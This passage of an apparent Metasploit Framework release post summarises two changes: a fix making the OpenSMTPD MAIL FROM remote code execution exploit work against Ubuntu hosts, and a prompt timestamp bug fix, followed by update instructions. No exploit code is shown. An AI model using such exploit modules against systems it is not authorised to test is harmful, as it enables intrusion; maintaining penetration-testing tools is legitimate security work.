  • #14632 from zomfg-zombie This fixes a compatibility issue with the OpenSMTPD MAIL FROM RCE exploit where it was failing to function when the target host’s shell uses a strictly POSIX compatible read utility as is the case in Ubuntu.
  • #14635 from Chiggins A bug was fixed in the lib/rex/ui/text/shell.rb library whereby users who used the %T character within their command prompts would not get the full timestamp information. A fix has been applied to address this regression so that users can now get the full timestamp information within their prompts.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).